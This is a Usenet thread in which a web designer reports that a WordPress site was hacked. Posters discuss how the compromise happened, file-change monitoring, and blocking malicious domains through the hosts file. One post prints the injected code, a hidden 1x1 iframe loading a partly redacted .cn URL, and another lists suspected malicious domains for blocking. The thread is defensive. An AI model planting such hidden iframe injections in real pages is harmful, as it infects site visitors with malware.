The wordpress site I designed has been running fine for 7 weeks, then at the 
weekend I got a phone call telling me both the home and log-in pages were 
out of order with errors;

Every index.php of all directories has been corrupted with </html> which is 
already set in the footer php, the source codes are sprayed with characters 
showing only as squares and has had an iframe added to it holding a URL with 
a .cn suffix.

When I took one of these from the server Avast recognised the iframe as a 
'virus/worm'. Would I be right to think that these squares displayed in the 
source code are Chinese characters along with a dodgy iframe generated by a 
virus?

-dE|_---

dE|_ wrote:

> When I took one of these from the server Avast recognised the iframe as a 
> 'virus/worm'. Would I be right to think that these squares displayed in the 
> source code are Chinese characters along with a dodgy iframe generated by a 
> virus?

Your site has been compromised and hacked.  It's now trying to hijack 
the browsers of anyone who visits the site and infect their PC's.  You 
need to work out if they broken in via your site and how much damage 
they caused to other stuff, or if they broke in via your hosting company 
and likewise, how much they've hijacked.

If they broke in via your site, it's likely to be an insecure plugin.

-- 
Tony Evans
Saving trees and wasting electrons since 1993
blog -> http://perceptionistruth.com/
olmr -> http://www.onelinemoviereviews.co.uk/
[ anything below this line wasn't written by me ]

"Tony"  wrote in message 
news:49a6f632$0$511$bed64819@news.gradwell.net...
> dE|_ wrote:
>
>> When I took one of these from the server Avast recognised the iframe as a 
>> 'virus/worm'. Would I be right to think that these squares displayed in 
>> the source code are Chinese characters along with a dodgy iframe 
>> generated by a virus?
>
> Your site has been compromised and hacked.  It's now trying to hijack the 
> browsers of anyone who visits the site and infect their PC's.  You need to 
> work out if they broken in via your site and how much damage they caused 
> to other stuff, or if they broke in via your hosting company and likewise, 
> how much they've hijacked.
>
> If they broke in via your site, it's likely to be an insecure plugin.

Well it's been making the same attacks at my client's second domain which is 
in a seperate sub directory and not a wordpress site. Good job.

It turns out that the square characterers were just caridge returns not 
recognised by basic Notepad, but for any potential interest this is the 
hacker's frame injection to the php tag (domain crossed out);

<?php get_footer(); ?<html><body><iframe
src="http://XXXXXX.cn/in.cgi?cocacola73" width=1 height=1 style="visibility:
hidden"></iframe></body></html>>

-dE|_---

dE|_ wrote:

> Well it's been making the same attacks at my client's second domain which is 
> in a seperate sub directory and not a wordpress site. Good job.

I don't know what kind of hosting you have so it may not be appropriate, 
but I run a cron job every night to report on all changed files on all 
the sites I host.

I have to filter out some directories which change a lot (like caches), 
and if I do an upgrade it's obviously going to report a lot of changes, 
but it's invaluable at spotting code which has been changed by something 
other than me.

-- 
Tony Evans
Saving trees and wasting electrons since 1993
blog -> http://perceptionistruth.com/
olmr -> http://www.onelinemoviereviews.co.uk/
[ anything below this line wasn't written by me ]

"dE|_"  wrote in message 
news:vEDpl.24735$183.21783@newsfe09.ams2...
:
: "Tony"  wrote in message
: news:49a6f632$0$511$bed64819@news.gradwell.net...
: > dE|_ wrote:
: >
: >> When I took one of these from the server Avast recognised 
the iframe as a
: >> 'virus/worm'. Would I be right to think that these squares 
displayed in
: >> the source code are Chinese characters along with a dodgy 
iframe
: >> generated by a virus?
: >
: > Your site has been compromised and hacked.  It's now trying 
to hijack the
: > browsers of anyone who visits the site and infect their PC's. 
You need to
: > work out if they broken in via your site and how much damage 
they caused
: > to other stuff, or if they broke in via your hosting company 
and likewise,
: > how much they've hijacked.
: >
: > If they broke in via your site, it's likely to be an insecure 
plugin.
:
: Well it's been making the same attacks at my client's second 
domain which is
: in a seperate sub directory and not a wordpress site. Good job.
:
: It turns out that the square characterers were just caridge 
returns not
: recognised by basic Notepad, but for any potential interest 
this is the
: hacker's frame injection to the php tag (domain crossed out);
:
: <?php get_footer(); ?<html><body><iframe
: src="http://XXXXXX.cn/in.cgi?cocacola73" width=1 height=1 
style="visibility:
: hidden"></iframe></body></html>>
:

Not joking, but can you fill in the blanks (just give us the 
missing content so we can reconstruct the above domain) so that 
those of us who configure / check entries in our Window 'hosts' 
file(s) etc. can check that the above domain does indeed have a 
look-up loop-back to 127.0.0.1 (localhost). Hopefully Spybot etc. 
will have it covered already but one never knows...
-- 
Wikipedia: the Internet equivalent of
Hyde Park and 'speakers corner'...
Sorry, mail to this address goes unread.
Please reply via group.

Jerry wrote:

> Not joking, but can you fill in the blanks (just give us the 
> missing content so we can reconstruct the above domain) so that 
> those of us who configure / check entries in our Window 'hosts' 
> file(s) etc. can check that the above domain does indeed have a 
> look-up loop-back to 127.0.0.1 (localhost). Hopefully Spybot etc. 
> will have it covered already but one never knows...


betstarwager dot cn
bestlotron dot cn
litetopfindworld dot cn
nickdick dot cn

my favourite

google dot analizer dot cn

top-name dot cn
diettopseek dot cn

-- 
Tony Evans
Saving trees and wasting electrons since 1993
blog -> http://perceptionistruth.com/
olmr -> http://www.onelinemoviereviews.co.uk/
[ anything below this line wasn't written by me ]

"Tony"  wrote in message 
news:49a710b8$0$510$bed64819@news.gradwell.net...

<snipped>

Cheers for that.

"Tony"  wrote in message 
news:49a710b8$0$510$bed64819@news.gradwell.net...
> Jerry wrote:
>
>> Not joking, but can you fill in the blanks (just give us the missing 
>> content so we can reconstruct the above domain) so that those of us who 
>> configure / check entries in our Window 'hosts' file(s) etc. can check 
>> that the above domain does indeed have a look-up loop-back to 127.0.0.1 
>> (localhost). Hopefully Spybot etc. will have it covered already but one 
>> never knows...
>
>
> betstarwager dot cn
> bestlotron dot cn
> litetopfindworld dot cn
> nickdick dot cn
>
> my favourite
>
> google dot analizer dot cn
>
> top-name dot cn
> diettopseek dot cn

betstarwager

"Jerry" asked...
> : when dE|_ wrote...
> : <?php get_footer(); ?<html><body><iframe
> : src="http://XXXXXX.cn/in.cgi?cocacola73" width=1 height=1
> style="visibility:
> : hidden"></iframe></body></html>>
> :
>
> Not joking, but can you fill in the blanks (just give us the
> missing content so we can reconstruct the above domain) so that
> those of us who configure / check entries in our Window 'hosts'
> file(s) etc. can check that the above domain does indeed have a
> look-up loop-back to 127.0.0.1 (localhost). Hopefully Spybot etc.
> will have it covered already but one never knows...

DO NOT VISIT, THIS SITE MAY BE HARMFUL
---------------------------------------------------------
   tp://betstarwager.cn/
---------------------------------------------------------

Searches on google looked ugly, had cocacola in the URL and had warning 
signs all over the place.

-dE|_---

"dE|_"  wrote in message 
news:dmQpl.63286$WX2.615@newsfe23.ams2...
:
<snip>
:
: DO NOT VISIT, THIS SITE MAY BE HARMFUL
: ---------------------------------------------------------
<snipped> betstarwager.cn/
: ---------------------------------------------------------
:
: Searches on google looked ugly, had cocacola in the URL and had 
warning
: signs all over the place.
:

That is EXACTLY why I want to create a look-up loop-back to my 
own 127.0.0.1 (localhost) 'server'!
-- 
Wikipedia: the Internet equivalent of
Hyde Park and 'speakers corner'...
Sorry, mail to this address goes unread.
Please reply via group.

and does anyone knows the solution of this problem? so if  i delete all ftp 
clients saved sessions (for ex. total commanders ctrl+f), the 
virus/malware/etc can not log in to the site root and modify the index files?

its not too good, if this "thing" can go in to the ftp side of the homepages.
..
btw i write php sites with function print_top_html() and print_down_html so 
if the thing modifies the index file then the homepage comes unreachable... 
its not so fine to modify the files twice within 1 day...
thanks!

url:http://myreader.co.uk/msg/12604864.aspx